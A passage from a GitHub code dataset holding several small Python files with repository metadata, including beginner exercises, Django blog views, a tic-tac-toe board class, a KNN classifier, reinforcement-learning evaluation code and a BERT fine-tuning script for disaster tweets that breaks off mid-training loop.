important_dict)","repo_name":"chris-straschewski/NLP","sub_path":"WC.py","file_name":"WC.py","file_ext":"py","file_size_in_byte":10655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73740306398","text":"import math\r\n\r\nX = int(input())\r\nY = float(input())\r\nZ = int(input())\r\nworkers = int(input())\r\nfor_wine = X * 0.4\r\ngrapes_for_wine = for_wine * Y\r\nliters_wine = grapes_for_wine / 2.5\r\nresult = liters_wine - Z\r\nif Z > liters_wine:\r\n print(f'It will be a tough winter! More {math.floor(abs(result))} liters wine needed.')\r\nelse:\r\n print(f'Good harvest this year! Total wine: {math.floor(liters_wine)} liters.')\r\n print(f'{math.ceil(result)} liters left -> {math.ceil(result / workers)} liters per person.')\r\n","repo_name":"DilyanTsenkov/SoftUni-Software-Engineering","sub_path":"Programming Basics with Python/02 Conditional statements/More exercises/03_Harvest.py","file_name":"03_Harvest.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"24040926696","text":"# View에 Model(Post 게시글) 가져오기\nfrom .models import Post\nfrom django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\ndef index(request):\n return render(request,'my_pet/index.html')\n\n# my_pet.html 페이지를 부르는 my_pet 함수\ndef my_pet(request):\n # 모든 Post를 가져와 postlist에 저장합니다\n postlist = Post.objects.all()\n # my_pet.html 페이지를 열 때, 모든 Post인 postlist도 같이 가져옵니다\n return render(request, 'my_pet/my_pet.html', {'postlist': postlist})\n\n# my_pet 의 게시글(posting)을 부르는 posting 함수\ndef posting(request, post_id):\n # 게시글(Post) 중 pk(primary_key)를 이용해 하나의 게시글(post)를 검색\n post = get_object_or_404(Post, pk=post_id)\n # posting.html 페이지를 열 때, 찾아낸 게시글(post)을 post라는 이름으로 가져옴\n return render(request, 'my_pet/posting.html', {'post': post})\n\ndef new_post(request):\n if request.method =='POST':\n new_article=Post.objects.create(\n postname=request.POST['postname'],\n contents=request.POST['contents'],\n petimage=request.FILES['petimage'],\n )\n return redirect('/my_pet/')\n return render(request, 'my_pet/new_post.html')\n\ndef delete_post(request, post_id):\n post = Post.objects.get(pk = post_id)\n if request.method == 'POST':\n post.delete()\n return redirect('/my_pet/')\n return render(request, 'my_pet/remove_post.html ', {'post':post})\n\ndef update_post(request, post_id):\n post = Post.objects.get(pk = post_id)\n if request.method =='POST':\n post.postname = request.POST['postname']\n post.contents = request.POST['contents']\n post.petimage = request.POST['petimage']\n post.save()\n return redirect('/my_pet/')\n return render(request, 'my_pet/update_post.html', {'post':post})","repo_name":"ChoiWonOong/Django_myPet","sub_path":"my_pet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38103450500","text":"from src.experiments import (\n bargaining_gap_experiment as bg_ig,\n compare_guarantees_experiment as cg_ig,\n total_surplus_experiment as ts_ig\n)\nfrom src.experiments.additive_utility_goods import (\n bargaining_gap_experiment as gb_au,\n total_surplus_experiment as ts_au\n)\n\n\nEXP_NUMBER = 1000\n\n\ndef run():\n experiments = [\n cg_ig.CompareGuaranteeExperiment(),\n bg_ig.BargainingGapExperiment(),\n bg_ig.BargainingGapMixedUtilitiesExperiment(),\n ts_ig.TotalSurplusExperiment(),\n gb_au.BargainingGapExperiment(),\n ts_au.TotalSurplusExperiment()\n ]\n\n for exp in experiments:\n print(f'run {exp}')\n exp.run_and_save(EXP_NUMBER)\n print(f'{exp} done!')\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"AdayevKP/fair_division_with_money","sub_path":"gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73547012318","text":"import cv2\nfrom scipy import ndimage\nimport scipy.misc\nimport numpy as np\nimport torch\nimport os\nimport json\nfrom math import *\nimport h5py\nimport matplotlib.pyplot as plt\n\nfrom ddqn_LWF.model_new import reinforcement_net_new\nfrom ddqn_LWF.utils_new import plot_figures, preprocessing, postProcessing\nimport warnings \nwarnings.filterwarnings(\"ignore\") \n\nnet = reinforcement_net_new(use_cuda=True)\n\nmodel_name = 'weight/behavior_LWF_10_1500_0.00.pth'\nnet.load_state_dict(torch.load(model_name))\n# net.grasp_net.load_state_dict(torch.load('weight/grasp_net.pth'))\n# net.value_net.load_state_dict(torch.load('weight/value_net.pth'))\nnet = net.cuda().eval()\n\n# torch.save(net.grasp_net.state_dict(), os.path.join(\n# '/home/austin/Grasp_DRL_2/weight', \"grasp_net.pth\"))\n\n# torch.save(net.value_net.state_dict(), os.path.join(\n# '/home/austin/Grasp_DRL_2/weight', \"value_net.pth\"))\n\n\nL = os.listdir('/home/austin/Test_ws/src/collect/src/Datasets_view')\n# L.sort()\n# print(L)\nup = [0,0]\nfr = [0,0]\nx = []\ny = []\nfor name in L:\n# for name in L[:1]:\n# for name in L[345:355]:\n # print(name)\n print(100*(up[1]+fr[1])/len(L), end='\\r')\n num = int(name.split('_')[1])\n A = os.listdir('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/rgb')\n A.sort()\n B = os.listdir('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/depth')\n B.sort()\n # print(B)\n # print(A)\n\n \n\n color = cv2.imread('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/rgb/'+A[0])\n # print(color.shape)\n color = cv2.resize(color, (224,224))\n depth = np.load('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/depth/'+B[0])\n depth[depth>10000] == 0\n\n\n color_tensor, depth_tensor, pad = preprocessing(color, depth)\n color_tensor = color_tensor.cuda()\n depth_tensor = depth_tensor.cuda()\n\n with torch.no_grad():\n prediction, prediction_new = net.forward(color_tensor, depth_tensor, is_volatile=True)\n\n _,_,aff, out, view = postProcessing(prediction, prediction_new, color, depth, color_tensor, pad, show=False)\n # print(view.shape)\n id = np.where(view == np.max(view))\n cv2.circle(view, (id[1][0], id[0][0]), 3, (0, 0, 0), 2)\n # print(id[1][0])\n x.append(id[0][0])\n y.append(id[1][0])\n with open('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/rgb/'+A[1],\"r\") as F:\n data = json.load(F)\n if data['shapes'][0]['label'] == 'upper':\n if num < 350:\n up[1] += 1\n if id[1][0] < 112:\n up[0] += 1\n else:\n fr[1] += 1\n if id[1][0] > 112:\n fr[0] += 1\n\n else:\n if num < 350:\n fr[1] += 1\n if id[1][0] > 112:\n fr[0] += 1\n else:\n up[1] += 1\n if id[1][0] < 112:\n up[0] += 1\n\n # fig = plt.figure(figsize=(10, 10))\n # fig.add_subplot(1, 3, 1)\n # plt.imshow(color[:,:,[2,1,0]])\n\n # fig.add_subplot(1, 3, 2)\n # plt.imshow(aff[:,:,[2,1,0]])\n # # plt.imshow(out[0][0])\n\n # fig.add_subplot(1, 3, 3)\n # plt.imshow(view)\n\n # plt.show()\n\n # os.mkdir('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/Qmap')\n # np.save('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/Qmap/qmap', out[0][0])\n # norm = np.linalg.norm(out[0][0])\n # out[0][0] = out[0][0]/norm\n # print(out[0][0])\n # plt.imshow(out[0][0])\n\n # plt.show()\nprint(up[0]/up[1])\n# print(up[0],up[1])\nprint(fr[0]/fr[1])\nplt.scatter(y, x)\n# plt.savefig('V6_1000.png', dpi=300)\nplt.show()\n\n#IfiveOO\n# vtwo0.17624521072796934\n# 0.7782426778242678\n# vthree0.29118773946360155\n# 0.7280334728033473\n# vfour0.20306513409961685\n# 0.8326359832635983\n# vfive0.5977011494252874\n# 0.4225941422594142","repo_name":"austin2408/Grasp_DRL_2","sub_path":"ddqn_evaluation_LWF.py","file_name":"ddqn_evaluation_LWF.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5612142935","text":"import torch\nfrom torch import Tensor\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom typing import Union, List\n\nfrom .genesys_qmodels import dram_layout, shuffle_weights\n\nclass QLayer(nn.Module):\n def __init__(self, layer: str, input_width: Union[int, List] = None, output_width: Union[int, List] = None,\n method: str = 'truncate', **kwargs):\n super(QLayer, self).__init__()\n self.input_width = input_width\n self.output_width = output_width\n self.method = method\n assert method == 'truncate' or method == 'scale'\n self.layer = getattr(nn, layer)(**kwargs)\n\n def forward_scaled(self, input: Tensor) -> Tensor:\n if self.input_width is not None:\n # quantize_per_tensor works only on float tensors\n qinput = torch.quantize_per_tensor(input.float(), self.input_width[0], self.input_width[1],\n self.input_width[2])\n output = self.layer.forward(qinput.dequantize())\n else:\n # Compute forward using floats since lot of torch operators don't have int support on CPUs\n output = self.layer.forward(input.float())\n if self.output_width is not None:\n qoutput = torch.quantize_per_tensor(output, self.output_width[0], self.output_width[1],\n self.output_width[2])\n return qoutput.dequantize()\n else:\n return output.int()\n\n def forward_truncate(self, input: Tensor) -> Tensor:\n if self.input_width is not None:\n input_mask = torch.ones(input.size()) * ((1 << self.input_width) - 1)\n qinput = torch.bitwise_and(input, input_mask.int())\n output = self.layer.forward(qinput.float()).int()\n else:\n # Compute forward using floats since lot of torch operators don't have int support on CPUs\n output = self.layer.forward(input.float()).int()\n if self.output_width is not None:\n output_mask = torch.ones(output.size()) * ((1 << self.output_width) - 1)\n qoutput = torch.bitwise_and(output, output_mask.int())\n return qoutput\n else:\n return output\n\n def forward(self, input: Tensor) -> Tensor:\n if self.method == 'truncate':\n return self.forward_truncate(input)\n else:\n return self.forward_scaled(input)\n\n @property\n def weight(self):\n return self.layer.weight\n\n @property\n def bias(self):\n return self.layer.bias\n\ndef gen_conv_testcase(input_dim, weight_dim, stride=1, padding=0, base_path=\".\", bias=False):\n # Input is (N, H, W, C)\n input = np.random.randint(low=0, high=127, size=input_dim, dtype=np.int8)\n # Weights is (KH, KW, OC, IC) layout\n weights = np.random.randint(low=0, high=127, size=weight_dim, dtype=np.int8)\n with open(f'{base_path}/input.txt', 'w') as f:\n f.write('\\n'.join(dram_layout(input)))\n with open(f'{base_path}/weights.txt', 'w') as f:\n f.write('\\n'.join(dram_layout(shuffle_weights(weights))))\n\n\n model = QLayer('Conv2d', in_channels=weight_dim[3], out_channels=weight_dim[2], kernel_size=weight_dim[0],\n stride=stride,\n padding=padding, bias=bias)\n input_tensor = torch.from_numpy(input)\n input_tensor = input_tensor.float()\n model.weight.data = torch.from_numpy(weights)\n model.weight.data = model.weight.data.float()\n # Reshape as Conv2D layer in pytorch needs input as (N,C,H,W)\n input_tensor = input_tensor.permute(0, 3, 1, 2)\n # Reshape as Conv2D layer in pytorch needs weight as (OC,IC,KH,KW)\n model.weight.data = model.weight.data.permute(2, 3, 0, 1)\n output = model(input_tensor)\n model.eval()\n # Output from pytorch is (N, OC, H, W)\n # Reshape output as Genesys will generate output as (N, H, W, OC)\n output = output.permute(0, 2, 3, 1).numpy()\n output = output.flatten().tolist()\n output = [str(x) for x in output]\n # Write outputs to file\n with open(f'{base_path}/output.txt', 'w') as f:\n f.write('\\n'.join(output))","repo_name":"VeriGOOD-ML/public","sub_path":"genesys/genesys/examples/genesys/genesys_pytorch_data.py","file_name":"genesys_pytorch_data.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"51"} +{"seq_id":"23389755710","text":"import random\r\n\r\npaises = [\"Czech\", \"Austia\", \"Germany\", \"Italy\", \"Spain\", \"France\", \"Belgium\", \"Romania\"]\r\nprecios = [1500, 3200, 3500, 2000, 2500, 3000, 2900, 1000]\r\n\r\nwhile True:\r\n try: \r\n budget = int(input(\"ingrese su budget: \"))\r\n break\r\n except ValueError:\r\n print(\"debe ingresar un presupuesto\")\r\n \r\ncountry = list(zip(paises,precios))\r\nviaje = list(filter(lambda x: x[1] <= budget,country))\r\n\r\nif viaje:\r\n choice = random.choice(viaje)\r\n print(f'con un presupuesto $ {budget: }, puede viajar a {choice[0]}')\r\nelse:\r\n print(f'con presupuesto de $ {budget: }, no hay destinos')\r\n ","repo_name":"AlGGB/travel_and_budget","sub_path":"travel_and_budget.py","file_name":"travel_and_budget.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19437828336","text":"# Задача 20:\n# В настольной игре Скрабл (Scrabble) каждая буква имеет определенную ценность.\n# В случае с английским алфавитом очки распределяются так:\n# A, E, I, O, U, L, N, S, T, R – 1 очко;\n# D, G – 2 очка;\n# B, C, M, P – 3 очка;\n# F, H, V, W, Y – 4 очка;\n# K – 5 очков;\n# J, X – 8 очков;\n# Q, Z – 10 очков.\n# А русские буквы оцениваются так:\n# А, В, Е, И, Н, О, Р, С, Т – 1 очко;\n# Д, К, Л, М, П, У – 2 очка;\n# Б, Г, Ё, Ь, Я – 3 очка;\n# Й, Ы – 4 очка;\n# Ж, З, Х, Ц, Ч – 5 очков;\n# Ш, Э, Ю – 8 очков;\n# Ф, Щ, Ъ – 10 очков.\n# Напишите программу, которая вычисляет стоимость введенного пользователем слова.\n# Будем считать, что на вход подается только одно слово, которое содержит либо только английские, либо только русские буквы.\n# Ввод: ноутбук\n# Вывод: 12\n\npoints = {1: 'aeioulnstrавеинорст',\n 2: 'dgдклмпу',\n 3: 'bcmpбгёья',\n 4: 'fhvmyйы',\n 5: 'kжзхцч',\n 6: 'jxшэю',\n 10: 'qzфщъ'}\nword = input('Введите слово: ')\nprint(sum([k for i in word for k, v in points.items() if i in v])) #цикл перебирает значения в списке word, второй цикл перебирает ключи и значения \n #словаря points с помощью метода items, и сравнивает их значения, складывая\n #ключи (k) в случае, если i == v","repo_name":"Modzhin35/pythonhw3","sub_path":"task20.py","file_name":"task20.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30190837024","text":"'''Exercício Python 044: Elabore um programa que calcule o valor a ser pago por um produto, considerando o seu preço normal e condição de pagamento:\n- à vista dinheiro/cheque: 10% de desconto\n- à vista no cartão: 5% de desconto\n- em até 2x no cartão: preço formal\n- 3x ou mais no cartão: 20% de juros'''\n\nprint('{:=^40}'.format(' LOJAS LAURITZ '))\nvalor = float(input('Digite o valor do produto:\\nR$'))\nprint('''FORMAS DE PAGAMENTO\n[ 1 ] à vista dinheiro/cheque\n[ 2 ] à vista no cartão\n[ 3 ] em até 2x no cartão\n[ 4 ] 3x ou mais no cartão''')\n\nopção = int(input('Qual é a opção? '))\n\nif opção == 1:\n print('O valor total do pagamento ficou de R${:.2f}'.format(valor - (valor * 0.1)))\nelif opção == 2:\n print('O valor total do pagamento ficou de R${:.2f}'.format(valor - (valor * 0.05)))\nelif opção == 3:\n parcela = valor / 2\n print('Sua compra será parcelada em 2x de R${:.2f}'.format(parcela))\n print('O valor total do pagamento ficou de R${:.2f}'.format(valor))\nelif opção == 4:\n totalP = int(input('Quantas parcelas? '))\n valor = valor + (valor * 0.2)\n parcela = valor / totalP\n print('Sua compra será parcelada em {}x de R${:.2f} COM JUROS'.format(totalP, parcela))\n print('O valor toral do pagamento ficou de R${:.2f}'.format(valor))\nelse:\n valor = valor\n print('\\033[2;31mOpção inválida de pagamento. Tente novamente!')\n","repo_name":"RafaelTLauris/Estudos-Python","sub_path":"PythonExercicios/Exercicios/ex044-(Gerenciador de Pagamentos).py","file_name":"ex044-(Gerenciador de Pagamentos).py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72745859358","text":"import numpy as np\r\nimport pylab as pl\r\nimport pandas as pd\r\nimport math\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn import neighbors, datasets\r\nimport random\r\nfrom numpy.random import permutation\r\n\r\ndf = pd.read_csv(\"breast_cancer_full.csv\")\r\ndf.replace('?',-99999, inplace=True)\r\ndf.drop(['id'], 1, inplace=True)\r\n\r\nrandom_indices = permutation(df.index)\r\nmax_length = math.floor(len(df)/3)\r\n\r\ntest = df.loc[random_indices[1:max_length]]\r\ntrain = df.loc[random_indices[max_length:]]\r\n\r\nx_col = ['Thickness','Size','Shape','Adhesion','Epithelial','Nuclei','Chromatin','Nucleoli','Mitosis']\r\ny_col = ['Class']\r\n\r\nknn = KNeighborsRegressor(n_neighbors=3)\r\nknn.fit(train[x_col],train[y_col])\r\npredictions = knn.predict(test[x_col])\r\n\r\nactual_set = test[y_col]\r\n\r\nactual = np.asarray(actual_set)\r\n\r\ncorrect = 0\r\ntotal = 0\r\n\r\nfor i in range(len(predictions)):\r\n if(predictions[i] == actual[i]):\r\n correct += 1\r\n total += 1\r\n\r\nprint('Accuracy: ', correct/float(total))\r\n","repo_name":"willsyo/Machine-Learning","sub_path":"KNN/SklearnKnn.py","file_name":"SklearnKnn.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"31891341918","text":"\"\"\" \n The tic-tac-toe game board to play tic tac toe\n \n ----------\n Attributes\n ----------\n rows : int\n columns: int\n self.__board: numpy.ndarray obj\n self.color: tupl\n self.square_width: int\n self.line_width: int\n self.width: int\n self.line_color: tupl\n\n\n Methods\n ------\n draw_shape(col=int, row=int, player=int)\n draws the players move on the tic tac toe board\n \n __check_available_square(col=int, row=int)\n checks if the selected square is available to be marked\n \n draw_circle(window = window, color = tupl, x= int, y=int)\n Draws the circle for the player\n\n draw_lines(window= window)\n draws the line that makes it a 3x3 grid\n \n __draw_horizontal_winning_line(window= Window obj, col=int)\n draws a horizontal winning line\n\n\n __draw_diagonal_winning_line_2(window = Window obj, row= int)\n draws a diagonal_line for the ... side\n\n __draw_vertical_winning_line(window = Window obj, row= int)\n draws a vertical line\n \n\n __draw_left_diagonal_winning_line(window = Window obj, row=int)\n draws the left diagnal winning line\n\n __draw_diagonal_winning_line_2(window = Window obj, row = int)\n draws the diagnal winning_line from the right corner\n\n __check_win(player = int, window = Window obj)\n Checks if a player has won the game\n\n __mark_board_full(row = int, col = int)\n Marks the board full if no the grid is full\n\n \"\"\"\nimport numpy\nimport pygame\n\n\nclass Board:\n \"\"\"A class to create the tic-tac-toe play board\"\"\"\n\n def __init__(self):\n self.rows = 3\n self.columns = 3\n self.__board = numpy.zeros((self.rows, self.columns))\n print(__doc__)\n self.color = (255, 255, 255)\n self.square_width = 200\n self.line_width = 20\n self.width = 600\n self.line_color = (255, 255, 255)\n \n \n def get_board(self):\n return self.__board\n\n def draw_shape(self, col, row, player):\n \"\"\"Creates the tic tac toe player board with rows and columns 3x3\n Parameters\n ----------\n col : int\n column to draw the shape\n row : int\n row to draw the shape\n player : int\n player which draw the shape\n\n \"\"\"\n # Starts with zero so, 0,1,2\n game_board = self.get_board()\n game_board[col][row] = player\n # self.__board[col][row] = player\n # print(self.board)\n\n def __check_available_square(self, col, row):\n \"\"\"Checks if the square is already marked\n Parameters\n ----------\n col : int\n Marked column to check if available\n row : int\n Marked row to check if available\n \"\"\"\n if self.__board[col][row] == 0:\n return True\n elif self.__board[col][row] == 1 or self.__board[col][row] == 2:\n return False\n\n def draw_circle(self, window, color, x, y):\n \"\"\"Draws a circle on the surface\n window : Window object\n window where the shape will be drawn on\n color : tuple\n tuple to pass the rgb values for the color\n x : int\n x value to draw the circle\n y: int\n y value to draw the circle\n \n \"\"\"\n circle = pygame.draw.circle(window, color, (x, y), 50, 10)\n pygame.display.update()\n return circle\n\n def draw_lines(self, window):\n \"\"\"Draw the horizontal and vertical lines for the tic tac toe game\n window : Window object\n window where the shape will be drawn on\n \"\"\"\n pygame.draw.line(\n window,\n self.color,\n (self.square_width, 0),\n (self.square_width, 600),\n self.line_width,\n )\n pygame.draw.line(\n window,\n self.color,\n (self.square_width * 2, 0),\n (self.square_width * 2, 600),\n self.line_width,\n )\n\n # color, start-end pos\n # x,y, x, y\n pygame.draw.line(\n window,\n self.color,\n (0, self.square_width),\n (self.width, self.square_width),\n self.line_width,\n )\n\n pygame.draw.line(\n window,\n self.color,\n (0, self.square_width * 2),\n (self.width, self.square_width * 2),\n self.line_width,\n )\n pygame.display.update()\n\n def __draw_horizontal_winning_line(self, window, col):\n \"\"\"Draws hortizontal winning line\n window: Window object\n window where the shape will be drawn on\n col: int\n columns to draw the horizontal winning line\n \"\"\"\n pos_y = col * 200 + 100\n pygame.draw.line(window, (255, 0, 0), (15, pos_y), (self.width - 15, pos_y), 15)\n pygame.display.update()\n return True\n\n def __draw_vertical_winning_line(self, window, row):\n \"\"\"Draws the vertical winning line\n window: Window object\n window where the shape will be drawn on\n row: int\n rows to draw the vertical winning line\n \n \"\"\"\n pos_x = row * 200 + 100\n pygame.draw.line(\n window, (self.line_color), (pos_x, 25), (pos_x, self.width - 15), 15\n )\n pygame.display.update()\n return True\n\n def __draw_left_diagonal_winning_line(self, window, row):\n \"\"\"Draw the left diagnal winning line\n window: Window object\n window where the shape will be drawn on\n row: int\n rows to draw the left diagonal winning line\n \"\"\"\n pos_x = row * 200 + 100\n pygame.draw.line(\n window, (self.line_color), (90, 25), (pos_x, self.width - 15), 15\n )\n pygame.display.update()\n return True\n\n def __draw_diagonal_winning_line_2(self, window):\n \"\"\"Draw the right diagnal winning line\n window: Window object\n window where the shape will be drawn on \n \"\"\"\n pygame.draw.line(\n window, (self.line_color), (self.width - 100, 90), (100, self.width), 15\n )\n pygame.display.update()\n return True\n\n def __check_win(self, player, window):\n \"\"\"Method which checks if the player has won\n player: int\n Player who wins the game\n window: Window object\n window where the shape will be drawn on \n \n \"\"\"\n for col in range(self.columns):\n if (\n self.__board[col][0] == player\n and self.__board[col][1] == player\n and self.__board[col][2] == player\n ):\n self.__draw_horizontal_winning_line(window, col)\n return True\n\n for row in range(self.rows):\n if (\n self.__board[0][row] == player\n and self.__board[1][row] == player\n and self.__board[2][row] == player\n ):\n self.__draw_vertical_winning_line(window, row)\n return True\n\n # check diagnal win\n if (\n self.__board[0][0] == player\n and self.__board[1][1] == player\n and self.__board[2][2] == player\n ):\n self.__draw_left_diagonal_winning_line(window, row)\n return True\n\n elif (\n self.__board[2][0] == player\n and self.__board[1][1] == player\n and self.__board[0][2] == player\n ):\n self.__draw_diagonal_winning_line_2(window)\n return True\n\n def __mark_board_full(self, row, col):\n \"\"\" Checks if the 3x3 grid is full \n row: int\n rows to check if they are full\n col: int\n columns to check if they are full\n \"\"\"\n marked_spots = 0\n for row in range(self.rows):\n for col in range(self.columns):\n if self.__board[col][row] == 1 or self.__board[col][row] == 2:\n marked_spots += 1\n # print(marked_spots)\n if marked_spots == 9:\n print(\"All spotts have been marked!\")\n return True","repo_name":"AriefBadal23/Tic-Tact-Toe","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":8436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12905932673","text":"#!/usr/local/bin/checkio --domain=py run all-the-same\n\n# In this mission you should check if all elements in the given list are equal.\n# \n# Input:List.\n# \n# Output:Bool.\n# \n# The idea for this mission was found onPython Tricks series by Dan Bader\n# \n# Precondition:all elements of the input list are hashable\n# \n# \n# END_DESC\n\nfrom typing import List, Any\n\ndef all_the_same(elements: List[Any]) -> bool:\n for i in elements:\n if i != elements[0]:\n return False\n return True","repo_name":"Chronona/PyCheckioSolutions","sub_path":"py_checkio_solutions/Home/all_the_same.py","file_name":"all_the_same.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73092827037","text":"import numpy as np\r\nimport pandas as pd\r\nimport random\r\nimport re\r\nimport csv\r\nimport torch\r\nfrom prettytable import PrettyTable\r\nfrom transformers import BertTokenizer, BertForSequenceClassification, AdamW\r\nrandom.seed(0)\r\nnp.random.seed(0)\r\ntorch.manual_seed(0)\r\ntorch.cuda.manual_seed_all(0)\r\n\r\n# Assuming that we are on a CUDA machine, this should print a CUDA device:\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\nprint(device)\r\n\r\n#Read the data\r\ntrain_df = pd.read_csv('train.csv')\r\ntest_df = pd.read_csv('test.csv')\r\n\r\n#add keyword to text\r\ntrain_df['keyword'] = train_df['keyword'].fillna('nokeyword')\r\ntrain_df['text'] = train_df['keyword'] + ' ' + train_df['text']\r\ntest_df['keyword'] = test_df['keyword'].fillna('nokeyword')\r\ntest_df['text'] = test_df['keyword'] + ' ' + test_df['text']\r\n\r\n\r\n#Clean the data\r\ndef cleandata(text):\r\n text = text.lower()\r\n #Remove webpage\r\n text = re.sub(r'http://\\S+', '', text)\r\n text = re.sub(r'https://\\S+', '', text)\r\n text = re.sub(r'http', '', text)\r\n #Remove mention\r\n text = re.sub(r'@\\S+', '', text)\r\n text = re.sub(r'@', '', text)\r\n text = re.sub(r'via', '', text)\r\n #Remove some sign\r\n text = re.sub(r'#', '', text)\r\n text = re.sub(r'_', '', text)\r\n text = re.sub(r'[*]', '', text)\r\n text = re.sub(r';\\)', '', text)\r\n text = re.sub(r':\\)', '', text)\r\n text = re.sub(r'-', '', text)\r\n text = re.sub(r':', '', text)\r\n text = re.sub(r';', '', text)\r\n text = re.sub(r'<', '', text)\r\n text = re.sub(r'=', '', text)\r\n text = re.sub(r'>', '', text)\r\n text = re.sub('\\+', '', text)\r\n text = re.sub(r'\\n', ' ', text)\r\n text = re.sub(r'\\'', '', text)\r\n text = re.sub(r'\\|', '', text)\r\n text = re.sub('\\[', '', text)\r\n text = re.sub('\\]', '', text)\r\n text = re.sub('\\(', '', text)\r\n text = re.sub('\\)', '', text)\r\n #Remove redundant sign\r\n text = re.sub(r'[?]+', '?', text)\r\n text = re.sub(r'[!]+', '!', text)\r\n text = re.sub(r'[.]+', '.', text)\r\n text = re.sub('\\s+', ' ', text).strip()\r\n\r\n text = re.sub('nokeyword ', '', text)\r\n #Remove non-ascii\r\n text = text.encode(\"ascii\", errors=\"ignore\").decode()\r\n return text\r\n\r\ntrain_df['text'] = train_df['text'].apply(cleandata)\r\ntest_df['text'] = test_df['text'].apply(cleandata)\r\n\r\n#load BERT tokenizer\r\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\r\n\r\n#find the maximum length of our dataset\r\nmax_len = 0\r\nfor sentence in train_df[\"text\"]:\r\n input_id = tokenizer.encode(sentence, add_special_tokens=True)\r\n max_len = max(max_len, len(input_id))\r\nfor sentence in test_df[\"text\"]:\r\n input_id = tokenizer.encode(sentence, add_special_tokens=True)\r\n max_len = max(max_len, len(input_id))\r\nprint(\"maximum length is \", max_len)\r\n\r\n#tokenize text\r\ninput_ids = []\r\nattention_masks = []\r\nfor sentence in train_df[\"text\"]:\r\n train_df_encode = tokenizer.encode_plus(sentence, add_special_tokens=True, max_length=max_len, padding='max_length',\r\n return_attention_mask=True, return_tensors='pt')\r\n input_ids.append(train_df_encode[\"input_ids\"])\r\n attention_masks.append(train_df_encode[\"attention_mask\"])\r\n\r\ninput_ids_test = []\r\nattention_masks_test = []\r\nfor sentence in test_df[\"text\"]:\r\n test_df_encode = tokenizer.encode_plus(sentence, add_special_tokens=True, max_length=max_len, padding='max_length',\r\n return_attention_mask=True, return_tensors='pt')\r\n input_ids_test.append(test_df_encode[\"input_ids\"])\r\n attention_masks_test.append(test_df_encode[\"attention_mask\"])\r\n\r\n#convert to tensor\r\ninput_ids = torch.cat(input_ids, dim=0)\r\nattention_masks = torch.cat(attention_masks, dim=0)\r\ntargets = torch.Tensor(train_df['target'])\r\ntargets = targets.long()\r\n\r\ninput_ids_test = torch.cat(input_ids_test, dim=0)\r\nattention_masks_test = torch.cat(attention_masks_test, dim=0)\r\n\r\n#load data\r\ndataset = torch.utils.data.TensorDataset(input_ids, attention_masks, targets)\r\ntestset = torch.utils.data.TensorDataset(input_ids_test, attention_masks_test)\r\n\r\n#Train val split\r\ntrain_len = int(len(dataset)*0.8) #select 80% training 20% validation\r\nval_len = len(dataset) - train_len\r\ntrain_set, val_set = torch.utils.data.random_split(dataset, [train_len, val_len], generator=torch.Generator().manual_seed(0))\r\n\r\n#build dataloader\r\nbatchsize = 16\r\ntrain_set_loader = torch.utils.data.DataLoader(train_set, batch_size=batchsize, shuffle=True)\r\nval_set_loader = torch.utils.data.DataLoader(val_set, batch_size=batchsize, shuffle=False)\r\ntest_set_loader = torch.utils.data.DataLoader(testset, batch_size=batchsize, shuffle=False)\r\n\r\n#Model: BertForSequenceClassification (This idea is from \"BERT Fine-Tuning Tutorial with PyTorch\")\r\nepochs = 2\r\n\r\nmodel = BertForSequenceClassification.from_pretrained(\r\n \"bert-base-uncased\",\r\n num_labels=2)\r\nmodel.cuda()\r\noptimizer = AdamW(model.parameters(), lr=5e-6, eps=1e-8)\r\n\r\n#training\r\ntrain_loss_total = []\r\nval_loss_total = []\r\nval_acc_total = []\r\nfor epoch in range(epochs):\r\n train_loss = 0\r\n model.train()\r\n #train on training set\r\n for i, data in enumerate(train_set_loader):\r\n input_id = data[0].to(device)\r\n attention_mask = data[1].to(device)\r\n target = data[2].to(device)\r\n model.zero_grad()\r\n loss, logits = model(input_id, token_type_ids=None, attention_mask=attention_mask, labels=target)\r\n train_loss += loss.item()\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\r\n optimizer.step()\r\n\r\n 